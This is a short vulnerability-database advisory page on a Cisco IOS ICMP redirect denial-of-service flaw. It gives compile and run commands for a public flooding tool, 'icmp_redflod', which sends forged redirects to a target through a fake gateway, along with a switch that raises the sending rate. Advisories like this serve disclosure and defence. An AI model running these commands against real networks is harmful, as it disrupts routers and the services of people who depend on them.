• info
• discussion
• exploit
• solution
• references

Cisco IOS ICMP Redirect Denial Of Service Vulnerability

The following exploit information was submitted:

To generate random ICMP redirect messages, a sender tool is available
at http://www.phenoelit.de/irpas/icmp_redflod.c, which has to be
linked with the IRPAS packet library.

linuxbox# cd /where/irpas/is
linuxbox# make libpackets.a
linuxbox# gcc -o icmp_redflod -I. -L. icmp_redflod.c -lpackets
linuxbox# ./icmp_redflod -i eth0 -D <destination_ip> -G <fake_gateway>

On high bandwidth networks, the command line switch -w0 can be used to increase the sending rate.